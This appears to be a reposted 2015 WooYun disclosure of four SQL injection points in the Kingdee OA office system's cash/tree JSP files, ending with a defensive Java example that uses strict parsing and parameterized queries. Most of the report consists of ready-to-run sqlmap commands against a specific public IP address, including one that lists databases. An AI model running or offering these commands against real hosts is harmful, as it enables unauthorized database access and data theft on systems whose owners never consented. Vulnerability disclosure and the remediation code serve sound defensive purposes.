
Four High-Risk SQL Injection Vulnerabilities in the Kingdee OA Office System

2015-10-28 15:10

The vulnerable files are:

/kingdee/cash/tree/get_nodes.jsp?node=1

/kingdee/cash/tree/get_part.jsp?ids=1

/kingdee/cash/tree/get_selected.jsp?ids=1

/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1



0x1 SQL injection 1

sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1"






0x2 SQL injection 2

sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_part.jsp?ids=1" --dbms mssql






0x3 SQL injection 3

sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_selected.jsp?ids=1"






0x4 SQL injection 4

sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1"






Affected instances:


Proof of vulnerability:

sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1" --dbs




Remediation:

Filter the input.
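
The remediation above says only to filter. As an added example (not code from the original report or from the vendor), this is one way a Java/JSP handler could treat an `ids`-style parameter: strict allow-list parsing followed by a parameterized `IN` clause. The table and column names, the `MAX_IDS` limit, and the premise that `ids` is a comma-separated list of integers are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

// Added example: table/column names (cash_tree_node, id, name) are hypothetical.
public class IdsParam {
    private static final int MAX_IDS = 200; // assumed upper bound on list size

    // Strictly parse "1,2,3" into integers; anything else is rejected, not cleaned up.
    static List<Integer> parseIds(String raw) {
        if (raw == null || !raw.matches("\\d{1,9}(,\\d{1,9})*")) {
            throw new IllegalArgumentException("ids must be a comma-separated list of integers");
        }
        List<Integer> ids = new ArrayList<>();
        for (String part : raw.split(",")) {
            ids.add(Integer.parseInt(part)); // at most 9 digits, so this cannot overflow
        }
        if (ids.size() > MAX_IDS) {
            throw new IllegalArgumentException("too many ids");
        }
        return ids;
    }

    // Only "?" placeholders are concatenated into the SQL text, never request data.
    static String buildQuery(int count) {
        return "SELECT id, name FROM cash_tree_node WHERE id IN ("
                + String.join(",", Collections.nCopies(count, "?")) + ")";
    }

    // The caller owns the returned statement and must close it.
    static PreparedStatement prepare(Connection conn, String rawIds) throws SQLException {
        List<Integer> ids = parseIds(rawIds);
        PreparedStatement ps = conn.prepareStatement(buildQuery(ids.size()));
        for (int i = 0; i < ids.size(); i++) {
            ps.setInt(i + 1, ids.get(i)); // JDBC parameters are 1-indexed
        }
        return ps;
    }

    public static void main(String[] args) {
        System.out.println(buildQuery(parseIds("1,2,3").size()));
        try {
            parseIds("1,abc"); // constructed non-numeric input
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Validation alone is a second line of defense; the bound parameters are what keep request data out of the SQL text.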

Source: www.wooyun.org/bugs/wooyun-2015-0129822
